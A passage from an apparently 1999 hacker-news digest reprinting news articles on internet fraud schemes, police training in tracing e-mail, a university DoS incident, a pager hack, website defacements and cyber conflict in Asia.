back down to 20 percent. “Those two sites by two college
students were taking up 70 percent of the university’s server,
” said Beruk. “That tells you how much software is
being uploaded and downloaded on a regular basis. It tells
you just how big the amount of traffic in illegal software
really is.”

-=-

Age-old scams find new home on Net
Problem is ‘expanding exponentially,’ FTC attorney says
By Adam Snyder
SPECIAL TO MSNBC

July 23 — A certified public accountant and by his
own estimation “no dummy,” Barry Wise first
heard about the Fortuna Alliance — a promising
investment opportunity being advertised on the
Internet — from a colleague in April 1996. That
same evening, he visited the Web site and read
about “a unique mathematical formula” called
“The Fibonacci Sequence,” whereby each
member could earn up to $5,000 per month, in
perpetuity, as soon as he or she had recruited
300 new investors.

REASSURED BY quotes on the site from dozens of
satisfied customers and by a 90-day money-back
guarantee, he mailed the Web site’s operators a check for
just less than $5,000.
Unfortunately for Wise and other
soon-to-be-dissatisfied customers, the Federal Trade
Commission had not yet concluded its investigation of the
Fortuna Alliance. The following month, the agency asked a
federal court to shut down the site, which it said was
advertising a classic pyramid, or “Ponzi,” scheme and to
order its operators to pay restitution to investors.
Because of the agency’s action, Wise recovered about
$3,000 — or close to 60 percent of his investment —
though it took a year before he received his partial
repayment from a claims administrator established by the
FTC. On Wednesday, July 22, the FTC announced it had
finished mailing more than $3 million in checks to people in
70 countries who were defrauded by Fortuna.
Since the crackdown on the Fortuna Alliance, the FTC
has taken similar action against 36 Web sites engaged in all
types of con games — everything from fraudulent land deals
and work-at-home schemes to bogus charities and crooked
contests.
They all boil down to a single ruse, says Susan Grant,
director of the National Fraud Information Center:
convincing victims to part with their money without having to
deliver anything of value in return.
“The fact that the Internet has made it possible for
anyone to communicate with anyone else has lowered the
barriers for being in business,” she said. “That’s obviously a
good thing for small entrepreneurs. But it’s also provided a
bonanza for scam artists.”
Most Internet frauds are “old-fashioned scams dressed
up in high-tech garb,” FTC Chairman Robert Pitofsky
testified during Senate hearings on Internet fraud in
February.

But the nature of the Internet makes these age-old
scams easier to spring. Before the Internet, peddlers of
get-rich-quick schemes in search of suckers had to operate
expensive mass-mailing campaigns or banks of telephones.
Today, with a single keystroke, a scam artist can send
e-mail to tens of thousands of online targets.

FOUR BASIC SCAMS
Experts charged with weeding out Internet fraud say
almost all online scams fall into four categories:
Pyramid scheme: “Turn $5 into $60,000 in just four
weeks” is most likely a come-on to an age-old “pyramid” or
“Ponzi” scheme. Like the Fortuna Alliance scam,
participants can only make money by recruiting new
suckers, creating a “pyramid” that collapses like a chain
letter as soon as no new “investors” can be found. Such
pyramid schemes are illegal on or off the Internet.
Risk-free investment: There may be such a thing as a
risk-free investment, but buying shares to help finance the
construction of an ethanol plant in the Dominican Republic,
which is what IVT Systems promised last year would
generated a return of 50 percent or more, is not one of
them. Nor are the countless other “risk-free” offerings on
the Internet. After the SEC filed a complaint, IVT stopped
advertising on the Internet.
Phone scams: Like many Internet scams, this is just a
variation of one that has been around for years but which
has found new life with the easy communications made
possible by e-mail. You receive an e-mail urging you, by
name, to call a telephone number in the “809” area code.
Typically the incentive is that you’ve won a contest or
sweepstakes. But “809” is actually the area code for the
Caribbean, and the call will show up on your next phone bill
at a rate of up to $20 per minute.
Top 10 Scams
As Federal Trade Commission Chairman Robert Pitofsky
once said, Internet frauds are "old-fashioned scams
dressed up in high-tech garb." But that doesn't mean
they're easy to spot.

-=-

Scam combines e-mail, overseas call
FTC says its new Internet fraud unit is hot on con artists’ trail
By Mike Stuckey
MSNBC

May 18 — Internet con artists are pairing e-mail
with overseas telephone numbers to fleece
unwitting U.S. consumers, federal authorities
said Tuesday in announcing a crackdown on the
scam.

‘That’s a good little scam.’


— IAN OXMAN
Spam Recycling Center

HERE’S HOW it works: Net users receive e-mail from
a phony company advising them that “we have received
your order.” The e-mail recipients have no memory of
placing such an order, but the note includes an official
looking “confirmation number” and the startling news that
anywhere from $300 to $900 will be billed to their credit
cards. Any questions? A telephone number offers help.


The number actually goes to a phone-sex line in
Dominica, an island nation in the Caribbean’s West Indies.
Call it, and you’ll wind up with an unexpected charge on
your next phone bill.
“That’s a good little scam,” said Ian Oxman of the
Spam Recycling Center, a group that helps federal
authorities and others track and fight junk e-mail.
In a first-of-its-kind action against so-far unknown
perpetrators, the Federal Trade Commission’s newly
formed Internet Fraud Rapid Response team has won a
court order against the con artists. The action orders the
perpetrators to stop the scam and prevents telephone
carriers from remitting funds to the company behind the
West Indies number, the FTC’s Eileen Harrington told
MSNBC.

The FTC's Eileen Harrington explains how
telephone funds were frozen in the case.

Harrington, the FTC’s director of marketing practices,
said the FTC team — two attorneys and a researcher — is
confident it will learn who is behind the e-mail and win a
judgment against them. “I don’t think it will take very long,
she said, adding that evidence gathered so far shows “the
perpetrator is probably in the United States.”
The FTC began investigating the scam about three
weeks ago as the result of some of the 10,000 consumer
complaints it receives each month, said Harrington. America
Online users were particularly hard hit, according to the
FTC. Another big e-mail provider, Yahoo!, got no
complaints, an employee said. Checks with telephone
carriers showed that traffic to the West Indies number
increased by “thousands and thousands” in March alone,
Harrington said.

CHARGES VARY
Many who called the number saw it result in a $1.50 to
$2 charge on their bills, Harrington said. Of course, if they
stayed on the line longer, the charge was more, and she
suspects a number of people called it twice, thinking they
had misdialed the first time.
“It never ceases to amaze me how clever people can
get when it comes to being underhanded,” said Oxman.
One bright spot for consumers, according to
Harrington: While “it may be that the crooks are getting
come benefit from technology … well, we’ve got some
benefits, too.” With the rise of the Web and e-mail as
information sources, the FTC is learning of scams “almost at
the same time the consumer sees them.”
As a result, “these are going to be rapidly brought
cases. We want to do these cases in days and weeks,” she
said.


-=-

The goods, the bids — and the ugly
Some buyers are getting hammered at online auction sites
By Adam Snyder
SPECIAL TO MSNBC

July 23 — Biologist William Porter made dozens of
purchases in Internet auctions, mostly adding to
his GI Joe collection, before deciding to upgrade
his computer. His bid of $615 on a brand new
Pentium 90 system was accepted, but the crooks
never delivered the goods. “I still buy things
from Internet auction sites, but I won’t be
making such an expensive purchase again, at
least not if they demand payment in advance,” a
rueful Porter said.

“IT’S ONE THING to risk $10 or $15. It’s another to
get ripped off for $615,” he said. Porter, a Maryland
resident who sent his check to a California address, is a
member of a growing fellowship of consumers who have
discovered that the issue of trust is paramount when
patronizing the garage sales of cyberspace.
Auction sites are a fast growing commercial sector on
the World Wide Web, offering people all over the world the
chance to bid on merchandise that would otherwise be far
beyond their geographic reach. The vast majority of the
transactions go off without a hitch, but the hectic hives of
e-commerce also present criminals with a perfect venue to
do their bidding.
There are as many as 1,000 auction sites on the Web,
matching sellers of everything from fine wines and rare coins
to used cars and yesterday’s fishing gear with interested
buyers. The highest bid wins the item, with the auction sites
usually charging a small fee (often as low as 25 cents) and 5
percent of the sale fee.

CATERING TO NICHES
Many of them cater to specific niches, such as
Winebid.com or Philatelists.com, but others are like
galactic-scale general stores.
EBay, which acted as middleman in Porter’s attempt to
purchase a computer, is the industry leader. It sold more
than $100 million worth of every kind of merchandise during
the first quarter of 1998, and according to the ratings firm
Media Metrix is now one of the five most visited shopping
sites on the Web. Another leading online auction house,
Onsale, has a registered customer base of more than
500,000 and has placed more than a million orders since its
launch in May 1995.
Fraud is not a problem at auction houses like
Firstauction, a subsidiary of the Home Shopping Network,
and other Web retailers that own the merchandise that they
sell directly to their customers. But sites that simply match
buyer and seller offer a jilted would-be buyer little recourse.

Porter waited two weeks before inquiring by e-mail
about the whereabouts of his computer. After a few
exchanges, the seller stopped responding to his queries and
the telephone number he had been given just rang and rang.
In the end all he could do was post a warning on EBay
to warn other buyers.

FTC URGES STANDARDS
Concerned about the problem of auction rip-offs, the
Federal Trade Commission called a meeting in late May
with executives from the top Internet auction sites —
including EBay, Up4sale , Auction universe,Haggle
onlineand Auction addict — and urged them to adopt a
voluntary code of conduct that would help prevent fraud.
But the auction operators were noncommittal. “The
short answer is that they were interested in making money,”
said an obviously frustrated Paul Luehr, one of the FTC
attorneys who attended the meeting.
“I can’t say that I spend more than 15 minutes a week
thinking about fraud,” acknowledged Meg Whitman,
president of EBay.
But Whitman and other online auctioneers say they
have already taken measures to combat fraud. For one
thing, most have feedback systems that warn buyers of
problem sellers. EBay, for example, assigns a plus 1 for a
positive comment and a minus 1 for a negative comment.
Anyone accumulating a score of minus 4 or lower is barred
from the system.
In an effort to prevent thieves from preying on their
clientele, most auction sites also require anyone with an
anonymous e-mail — a Hotmail or Yahoo address, for
example — to register with a credit card.

Such measures are by no means foolproof, however.
Fraudulent sellers will often adopt multiple e-mail accounts
that allow them to switch identities at will. And criminals
who prowl the auction sites can use fraudulent credit cards
to establish legitimate-appearing accounts.

ONLINE SHILLS A DANGER
Shills represent another danger to the unsuspecting
bidder. Most auction houses have rules against bidders in
cahoots with the seller making bids for the sole purpose of
driving up the price. But such tactics are virtually impossible
to identify online, observers say.
“In a private sale, there’s not much someone who is
cheated can do,” said Susan Grant, director of the National
Fraud Information Center. “It’s not like responding to a
local classified ad or buying something at a tag sale from the
guy down the road, in which case you can drive to the
seller’s house or take a trip to the local courthouse.”
Auction Universe, owned by Times Mirror Co., tries to
mitigate this problem by partnering with local newspapers
and attempting to match buyer and seller within the same
geographic area. “We sell a lot of cars,” said President and
CEO Larry Schwartz, “and almost all of them are sold to
someone locally. We have no more than three or four
complaints per month.”
The National Fraud Information Center, the FTC and
online auction sites themselves offer recommendations on
how to avoid becoming a victim of an unscrupulous seller.
These include paying close attention to the site’s evaluation
system, paying with a credit card whenever possible and
using an escrow agent for large transactions. Some sites
provide links to several such agents who, for a small fee,
will hold the money until the goods are delivered.

FTC TAKES ACTION
But the FTC is not yet convinced that the voluntary
guidelines currently in place are enough of a deterrent to
fraud and is becoming more aggressive in going after auction
house scam artists.
In April, it took action against Craig Hare of Lake
Worth, Fla., who, according to the FTC complaint, used
online auction houses to offer new and used computers for
sale. Then after the winning bidders paid as much as $1,450
per computer, Hare provided neither the merchandise nor a
refund.

Neither Hare nor his attorney
could be reached for comment.
The FTC is investigating other
auction scammers who systematically
float from one auction house to
another, defrauding consumers.
The agency also says it could take
action against the auction sites if the
industry’s problems worsen. “The test
would be if we determined that an auction site was engaged
in ‘unfair and deceptive practices,’ ” said Lisa Hone, an
FTC staff attorney.

@HWA

41.0 Cops Receive Info on Internet Crime Fighting
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
An all-day seminar on "Law Enforcement and the
Internet" was recently held in New York and sponsored
by Law Enforcement Internet Intelligence Report. The
seminar covered topics such as tracking e-mail
messages to how to spot malicious activity to the legal
pitfalls in preparing subpoenas and search warrants.

APB Online
http://www.apbnews.com/cjprofessionals/behindthebadge/1999/10/26/seminar1026_01.html


Cops Get Lesson in Cyber-Sleuthing
Taught to Track E-mail, Crack Hackers, Win Subpoenas

Oct. 26, 1999

By David Noack

TARRYTOWN, N.Y. (APBnews.com) -- When
fighting Internet crime, investigators should
use all the same investigative methods they
use in the brick-and-mortar world. After all,
cyber-crooks leave behind clues and patterns
just like traditional criminals, experts say.

With that said, Detective Eric Lundberg, a
high-tech crime expert from the
Massachusetts Attorney General's Office,
turned his attention to the 150-person law
enforcement audience gathered here recently.
They were attending an all-day seminar on "Law Enforcement and the
Internet" held by the Law Enforcement Internet Intelligence Report, a
Boston-based newsletter covering the Internet and law enforcement.

The would-be cyber-sleuths were briefed on everything from the fine points
of tracking e-mail messages to how to spot computer hackers to the legal
pitfalls in preparing subpoenas and search warrants when going after
computer criminals.

E-mails leave cyber-footprints

Lundberg detailed his tactics for identifying a cyber-criminal when there is
nothing to go on but an anonymous and threatening e-mail message.

While it seems complicated, Lundberg stressed that searching for the true
identity of e-mail is a process of backtracking, since e-mails actually leave
cyber-footprints.

E-mail is initially composed on a user's computer and then sent to a mail
server computer, which is typically located at an Internet service provider
such as America Online or CompuServe. Finding out where an e-mail
originated is done by examining e-mail headers -- computerese for detailing
the e-mail's travels in cyberspace.

E-mail headers not only include an e-mail address, but also an Internet
protocol address, which is a series of numbers, Lundberg explained. Also
included are the names of mail server computers, which relay e-mail
messages. They can all help pinpoint a suspect.

Difficulty level increasing

As more people take advantage of free
Web-based e-mail services that allow them
to mask their identities in cyberspace,
however, investigators say it's becoming
more difficult to trace criminal activity and
identify the culprits.

Services such as Yahoo! Mail or Hotmail from the Microsoft Corp. are
allowing computer users to create false e-mail identities, aliases and
handles. Anyone who wishes can register an e-mail account to stalk and
harass other users, obtain child pornography, hack into Web sites and
gamble. Often, there's not much that can be done to prevent it.

Thor Lundberg, who is Eric's brother and a computer crimes investigator
with the Raynham, Mass., Police Department, said that developing a profile
of a computer hacker is difficult.

"Hackers vary from being loners [and] misfits to being very arrogant and
cocky," Thor Lundberg said.

Profiling online behavior

However, he said hackers do repeat certain online behaviors that can add
up to an electronic profile of what they target and leave other cyber-clues to
how they go about performing the hack.

Thor Lundberg explained that before hackers go after a particular Web site,
they scout around for vulnerabilities, such as a weak firewall, an open port
or another way to get into a server to cause damage.

"Another hacker may not use that approach and look for holes, but try to
find out how many neighbors, how many other servers are connected to
that main computer server," he said.

Warned about reckless searches

Michael Delohery, an assistant Westchester County district attorney in the
high-tech crime bureau, cautioned police officers to be careful when
searching and seizing computer equipment and in the way they draft
subpoenas and search warrants.

"You want to get ahold of subpoenas and search warrants so you can go
obtain information. I'm here to warn you about going out and doing that
recklessly," Delohery said.

He said that if they don't follow the right procedures, individual police
officers and even prosecutors open themselves up to civil liability.

He cited some pieces of federal legislation that affect how to go about
gathering Internet-related crime evidence.

Law includes electronic publishing

The Privacy Protection Act is a result of the police in Palo Alto, Calif.,
getting a search warrant and seizing materials from a student newspaper
that had covered a campus protest and subsequent clash with the police.

The act prevents the seizing of two categories of evidence, defined as
documentary materials and work-product materials. But the law includes a
number of exceptions to what can be obtained during a search, and the law
has been expanded to also include electronic publishing.

"If you do not follow the guidelines of the statute, you can be sued
personally, and this has happened," Delohery said.

Federal law says what cops can do

The other federal law is the Electronic Communications Privacy Act, which
covers three kinds of communications: wire, oral and electronic mail.

"This law lays down the guidelines for what you can do. It is not an easy
subject to understand. But what you can take away from it is very simple. If
you want subscriber information, who is behind that screen name, what's
his address, what were his log-on times, what phone numbers was he
logging into, that is information you can get through a grand jury subpoena.
If you want to get anything further, such as e-mail and buddy list
information, that is considered stored electronic communications,"
Delohery explained.

He said when seeking to find the real name behind a screen name, the first
thing to do is to get a subpoena to the contact person at the Internet
service provider. "They should be able to give you a billing address, a billing
name, credit card information and a telephone number, maybe two
telephone numbers. Now you have a lot you can work with. The rest is not
high-tech. This is basic police work, stuff that you guys know," Delohery
said.

Jurisdiction problems on Internet

Delohery also said the lack of geographic boundaries in dealing with
Internet crime create jurisdictional problems.

"It's complicated because of the nature of the beast that you're dealing
with," Delohery said.

"This is not a simple little thing where you can say the murder took place
in this town, in this particular house, at a very specific location. When you
get connected to the Internet, you are now part of a worldwide community.
The jurisdiction can bounce around from different areas," he said.

David Noack is an APBnews.com staff writer (david.noack@apbnews.com).
Cops Get Lesson in Cyber-Sleuthing
Taught to Track E-mail, Crack Hackers, Win Subpoenas

Oct. 26, 1999

By David Noack

TARRYTOWN, N.Y. (APBnews.com) -- When
fighting Internet crime, investigators should
use all the same investigative methods they
use in the brick-and-mortar world. After all,
cyber-crooks leave behind clues and patterns
just like traditional criminals, experts say.

With that said, Detective Eric Lundberg, a
high-tech crime expert from the
Massachusetts Attorney General's Office,
turned his attention to the 150-person law
enforcement audience gathered here recently.
They were attending an all-day seminar on "Law Enforcement and the
Internet" held by the Law Enforcement Internet Intelligence Report, a
Boston-based newsletter covering the Internet and law enforcement.

The would-be cyber-sleuths were briefed on everything from the fine points
of tracking e-mail messages to how to spot computer hackers to the legal
pitfalls in preparing subpoenas and search warrants when going after
computer criminals.

E-mails leave cyber-footprints

Lundberg detailed his tactics for identifying a cyber-criminal when there is
nothing to go on but an anonymous and threatening e-mail message.

While it seems complicated, Lundberg stressed that searching for the true
identity of e-mail is a process of backtracking, since e-mails actually leave
cyber-footprints.

E-mail is initially composed on a user's computer and then sent to a mail
server computer, which is typically located at an Internet service provider
such as America Online or CompuServe. Finding out where an e-mail
originated is done by examining e-mail headers -- computerese for detailing
the e-mail's travels in cyberspace.

E-mail headers not only include an e-mail address, but also an Internet
protocol address, which is a series of numbers, Lundberg explained. Also
included are the names of mail server computers, which relay e-mail
messages. They can all help pinpoint a suspect.

Difficulty level increasing

As more people take advantage of free
Web-based e-mail services that allow them
to mask their identities in cyberspace,
however, investigators say it's becoming
more difficult to trace criminal activity and
identify the culprits.

  
Services such as Yahoo! Mail or Hotmail from the Microsoft Corp. are
allowing computer users to create false e-mail identities, aliases and
handles. Anyone who wishes can register an e-mail account to stalk and
harass other users, obtain child pornography, hack into Web sites and
gamble. Often, there's not much that can be done to prevent it.

Thor Lundberg, who is Eric's brother and a computer crimes investigator
with the Raynham, Mass., Police Department, said that developing a profile
of a computer hacker is difficult.

"Hackers vary from being loners [and] misfits to being very arrogant and
cocky,"
Thor Lundberg said.

Profiling online behavior

However, he said hackers do repeat certain online behaviors that can add
up to an electronic profile of what they target and leave other cyber-clues to
how they go about performing the hack.

Thor Lundberg explained that before hackers go after a particular Web site,
they scout around for vulnerabilities, such as a weak firewall, an open port
or another way to get into a server to cause damage.

"Another hacker may not use that approach and look for holes, but try to
find out how many neighbors, how many other servers are connected to
that main computer server,"
he said.

Warned about reckless searches

Michael Delohery, an assistant Westchester County district attorney in the
high-tech crime bureau, cautioned police officers to be careful when
searching and seizing computer equipment and in the way they draft
subpoenas and search warrants.

"You want to get ahold of subpoenas and search warrants so you can go
obtain information. I'm here to warn you about going out and doing that
recklessly,"
Delohery said.

He said that if they don't follow the right procedures, individual police
officers and even prosecutors open themselves up to civil liability.

He cited some pieces of federal legislation that affect how to go about
gathering Internet-related crime evidence.

Law includes electronic publishing

The Privacy Protection Act is a result of the police in Palo Alto, Calif.,
getting a search warrant and seizing materials from a student newspaper
that had covered a campus protest and subsequent clash with the police.

The act prevents the seizing of two categories of evidence, defined as
documentary materials and work-product materials. But the law includes a
number of exceptions to what can be obtained during a search, and the law
has been expanded to also include electronic publishing.

"If you do not follow the guidelines of the statute, you can be sued
personally, and this has happened,"
Delohery said.

Federal law says what cops can do

The other federal law is the Electronic Communications Privacy Act, which
covers three kinds of communications: wire, oral and electronic mail.

"This law lays down the guidelines for what you can do. It is not an easy
subject to understand. But what you can take away from it is very simple. If
you want subscriber information, who is behind that screen name, what's
his address, what were his log-on times, what phone numbers was he
logging into, that is information you can get through a grand jury subpoena.
If you want to get anything further, such as e-mail and buddy list
information, that is considered stored electronic communications,"

Delohery explained.

He said when seeking to find the real name behind a screen name, the first
thing to do is to get a subpoena to the contact person at the Internet
service provider. "They should be able to give you a billing address, a billing
name, credit card information and a telephone number, maybe two
telephone numbers. Now you have a lot you can work with. The rest is not
high-tech. This is basic police work, stuff that you guys know,"
Delohery
said.

Jurisdiction problems on Internet

Delohery also said the lack of geographic boundaries in dealing with
Internet crime create jurisdictional problems.

"It's complicated because of the nature of the beast that you're dealing
with,"
Delohery said.

"This is not a simple little thing where you can say the murder took place
in this town, in this particular house, at a very specific location. When you
get connected to the Internet, you are now part of a worldwide community.
The jurisdiction can bounce around from different areas,"
he said.

David Noack is an APBnews.com staff writer (david.noack@apbnews.com).

@HWA

42.0 LSU Experiences DOS Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
A compromised student computer in Kirby-Smith Hall of
Louisiana State University is being blamed for
deprivation of service problems on some of LSU's
systems. (If you want to laugh read some of the quotes
in this article attributed to LSUPD Capt. Mark Shaw. It is
good to know he is on the case.)

Excite News
http://news.excite.com/news/uw/991027/university-291

LSU Web problems due to hacker

Updated 12:00 PM ET October 27, 1999


By Jenny Heil
The Reveille
Louisiana State U.

(U-WIRE) BATON ROUGE, La. -- The problems students may have experienced
last week in gaining access to the Louisiana State University homepage
were due to the work of a computer hacker.

Computing Services was experiencing deprivation of service problems,
meaning legitimate users were getting busy signals when trying to log on
the LSU website, said LSUPD Capt. Mark Shaw.

The problem was traced to a student's computer in Kirby-Smith Hall, but
Computing Services determined the person causing the deprivation of
services was not the owner of the computer. Rather, the person was from
the outside and hacking into the student's computer without his
permission, Shaw said.

The hacker illegally tapped into the LSU system, bombarding the site with
traffic so that regular users could not log on, Shaw said.

"Computers are far from anonymous. They are not," Shaw said. "A system
analyst can monitor any key stroke of any machine accessed to their
machine."


In this case, Computing Services was monitoring its users to find the
cause of the connection's crash. A massive amount of traffic was coming
from one computer, so Computing Services called LSUPD and went to the
source, Shaw said.

"We believe the hacking may be coming from out of the country," Shaw said.
"That's the unique thing about the Internet. Once they're in, it can
literally be anywhere in the world."


Computing Services does not intend to further investigate this incident,
since the problem is solved for the time being, Shaw said.

"All we're really interested in is restoring services," he said. "If we
continue to see the problem in the future, we'll go into deeper measures."


Students should take precautions to protect not only the LSU mainframe,
but their personal computers as well, Shaw said.

"If you're not utilizing the mainframe or Internet access through the
mainframe, shut down your Internet browser or log off the mainframe,"
Shaw
said.

Signing off the Internet when a student is not using it can prevent
hackers from causing problems such as the one Computing Services
experienced Oct. 22.

"It's a good, safe precaution for all users because once they're [hackers]
in, they can do anything,"
Shaw said. "The old 'dog ate my homework' has
been replaced by 'my computer crashed.'"


Students should also make sure their passwords include numbers and
letters, which they should not share with anyone.

LSUPD has dealt with other computer fraud cases in the past, such as
people accessing areas of the LSU site without authorization, people
downloading or making illegal copies of software and people using the
mainframe as storage space, Shaw said.

"A lot of what we see is someone coming into the LSU system to go out and
access another site,"
he said.

If the current problem does come up again, Shaw said he thinks the cause
may be the same, someone using a student's computer to gain access to LSU.

"If we just prevent the problem [with the above mentioned methods], it's
as much for the students' protection as it is for the University,"
Shaw said.

(C) 1999 The Reveille via U-WIRE

@HWA

43.0 Oklahoma Paging System Vandalized
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
Details are sketchy but a vandal broke into a MetroCall
paging system in Oklahoma and sent out a page that
somehow triggered dozens of others. (Of course they
don't use the word vandal this guy had to be a 'hacker'.)

Excite News
http://news.excite.com/news/r/991028/06/ok-state-news-6

Pager Hoax Blamed On Computer Hacker

Updated 6:22 AM ET October 28, 1999

(STATEWIDE) -- Authorities now know the cause of a pesky pager problem in
Oklahoma. MetroCall says a hacker broke into its paging system yesterday
morning and sent out a page that snowballed into dozens more around the
state. The pages went off for more than ten minutes. One of the two dozen
numbers sent out in the pages belonged to the Cardiac Central Monitoring Unit
at Presbyterian Hospital. It was flooded with calls all morning from pager
owners, calling to find out who paged them. MetroCall says the situation has
been remedied.

@HWA

44.0 You Thought You Were Safe
~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Ender Wiggin
Brian Martin talks about the fact that nothing
computerized is safe -- not your Dreamcast, your Palm
Pilot, your word processing program or your telephone.
He says "Security is all-inclusive, no longer a realm of
obscure networks or sensitive databases full of nuclear
codes and credit card numbers."


OSALL
http://www.aviary-mag.com/Martin/Safety/safety.html


And You Thought You Were Safe!
10/27/99

Brian Martin
Staff Writer

The realm of computer security is not an isolated slice of life reserved for
geeks and bitheads. Security is all-inclusive, no longer a realm of obscure
networks or sensitive databases full of nuclear codes and credit card
numbers. I know this may be hard to swallow for many people as they
haven't given the matter serious thought. Stop reading for a minute and think
about all things computerized in your life. Now consider which ones present
potential security or privacy concerns to you. If you think any less than 90%
or so present these problems, think again.

Some will cast this notion aside in favor of the argument that so many
security concerns are so trivial that they make no real difference. Who cares
if someone knows you visited a web site or purchased something online --
right? This argument can effectively be countered any number of ways as
long as the reader is willing to give them appropriate consideration. First,
each of these small concerns add up. To use an old but familiar and fitting
analogy, consider each privacy violation a brick. Put enough of these bricks
together and you have a full-blown wall. Second, at what point do they stop
being small and trivial? If you convince yourself that each security
vulnerability is small, they slowly begin to grow without you acknowledging
it. Before long, they have turned into full blown risks that your mind
associates with 'trivial'.

So in a single day, where do you encounter these risks? Anytime you use
technology. Before you say "But I don't use it that much!" think about how
much technology surrounds your life. In many cases it has become so
integrated that you often stop noticing it. Have a personal organizer like a
Palm Pilot? Play games on a Sega Dreamcast? Send e-mail to friends or
family via an on-line service? Have controlled access to your office via
'strong' token cards? These points of technology slowly add up and paint a
bigger picture of rapidly degrading privacy while security vulnerabilities
increase in number. All of the above, and we've barely touched serious
computing as far as most people are concerned.

To anyone reading this that is passingly familiar with computer based news
outlets like Wired, MSNBC and others, this is no doubt preaching to the
choir. For those of you new to the net, I write this in hopes that you are fully
aware just how vulnerable your computer setup and system can be. The
disturbing trend emerging in people's reactions to security is that perception
says if you aren't online, you are safe. I hate to break this to you, but
connectivity has little to do with security and privacy. All it takes is a single
ten second connection to the net and game over.

You boot up your computer and interface with the Operating System. Be it
Windows NT, Windows 95, Solaris or any other platform, it is potentially
vulnerable. When you open your browser, it too poses more risks than you
can possibly imagine. Both Microsoft Internet Explorer and Netscape
Navigator have had their fair share of problems. Even in seemingly safe
applications like Microsoft Word lurks danger. Users connecting to the net
via cable modem learned quickly that while their walls protected them from
neighbor's prying eyes, their modems certainly did not.

As with all articles on security, I try to present the problem and a solution for
my readers. What can I possibly suggest to counter such an overwhelming
amount of intrusions into your personal privacy and security? Awareness.
Just understanding and realizing the concerns better equips you to battle the
hoards of bad guys we always read about. Be proactive when using anything
electronic, assess the risks, and proceed with caution. All joking aside, it
may save you a lot of headache in the near future.


@HWA

45.0 The Weather Channel and Four More .gov/.mil Sites Defaced
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Space Rogue
Yesterday was another busy day for those defacing web
sites. Web sites owned by the Navy and the Marine
Corps where hit as was The Weather Channel. Groups
and people such as Narcissus, High-Tech Hate, fuqraq,
flipz, p4riah, Pakistan Hackerz Club and others have
claimed responsibility. (Unfortunately most of these
pages are not anything to look at which is why we have
not been mirroring them. We did grab a few.)

HNN Defaced Pages Archive
http://www.hackernews.com/archive/crackarch.html

Attrition Web Mirror
http://www.attrition.org/mirror/

@HWA

46.0 Nerds Will Fight Next World War
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by no0ne
The Economist has an article on how computers are
being used as a weapon and how it has changed the
way politics, propaganda and other agendas and
objectives are being pushed in Asia. This is mostly fear
mongering so if you're busy today don't bother.

The Economist
http://www.economist.com/editorial/freeforall/30-10-99/as9668.html


ASIA

The Internet

HACKING, spamming and spreading viruses. Each is a means to disrupt an
enemy’s computer systems, and each has been employed by whizz-kids, maybe
even by governments, in recent international disputes. Especially in
Asia, computer nerds have nudged their way to the front line this year,
arguing that the Internet is a potent weapon. Are they right?

It is certainly useful for propaganda. Hours after the coup in Pakistan
this month, the “Islamic group of Hackers” rewrote a government website
to praise the army and condemn the arrested prime minister as corrupt,
foolish and bald. Earlier, both Pakistani and Indian propagandists
concerned with the conflict in Kashmir had denounced their enemies
online, and attacked each other’s websites. That of the Indian army was
“hijacked”, its content replaced with stories of torture of Kashmiri
separatists. Similar attacks occurred during the Kosovo war this spring,
and rival Chinese and Taiwanese hackers frequently compete to plant their
national flags on rival sites.

The Internet is anonymous, so groups in repressive countries can use it
with some confidence to organise themselves. The Falun Gong spiritual
movement in China—which conducted mass protests this spring and again
this week, despite a government crackdown—is said by some to be managed
by e-mail. The group’s websites are used to spread news and to encourage
followers not to be browbeaten. Dissident hackers have attacked Chinese
government computers used to censor websites and in return, it is
claimed, government technicians have attacked those of dissidents.

This information war is at its fiercest when activists try to sabotage
others’ computers. East Timorese separatists threatened to employ scores
of expert hackers against the Indonesian authorities if the government
tried to rig the independence referendum in August. Jose Ramos Horta, a
Timorese leader, vowed that specialists would infect computers of the
Indonesian banking system with viruses. That, they said, would bring
economic chaos.

The threat went unfulfilled. But in China and Taiwan a cyber war of sorts
has been under way for several months. After the Taiwanese president, Lee
Teng-hui, said in July that relations with China should be considered as
those between countries, teams of hackers have tried to disrupt rival
computer systems. The National Security Bureau in Taiwan says that they
have broken into government networks, including those at the justice
ministry, over 150 times recently. Many incidents are blamed on Chinese
government agencies. One report suggests that 72,000 “cyberspace attacks”
were launched from China against Taiwan in August alone. In response,
Taiwanese hacked into websites of China’s taxmen and the railways
ministry.

The toll can be severe. The Pentagon reckons that last year the Taiwanese
spread two viruses, known as the Bloody 6/4 and Michelangelo, in part to
protest against the massacre of students around Tiananmen Square in 1989.
They damaged some 360,000 computers in China, at a cost of $120m.
Taiwan’s deputy prime minister gave warning this autumn that cyber war is
a serious worry for the future. And a report this month for the United
States Congress said America’s communications, defence, power and
emergency services were all vulnerable to computer attacks. Those on
businesses—this week a hacker claimed he had stolen details of 150,000
Internet users at Cable and Wireless—illustrate such weaknesses.

So governments are getting involved too. They develop defences for
computer networks, and it is assumed they also prepare methods of attack.
Hackers at NATO may have meddled with Yugoslavia’s communications system
during the Kosovo war. After the bombing of China’s embassy in Belgrade,
there was one direct response on the Internet: American government
websites were swamped with e-mails. This practice, known as “spamming”,
is designed to overload computers with information, making them
unworkable.

Cyber attacks have become a favourite topic of military strategists.
Taiwan claims China conducted an exercise early this summer in Lanzou and
Beijing military districts to see how computer viruses could cripple an
enemy’s command-and-control centre. “China has developed the techniques
to execute an information war in these military exercises,” said Abe
Charlie Lin, of Taiwan’s defence ministry. Others will be doing the same,
perhaps with the help of Internet specialists and the many institutes for
the study of cyber warfare. There is a service on the Net giving details
of such attacks. Unfortunately, it is at present out of order.


@HWA

47.0 Hole Found in Mac OS 9
~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by wh4cked
What is believed to be the first security vulnerability
found in MacOS 9 has been posted. MacOS 9 has been
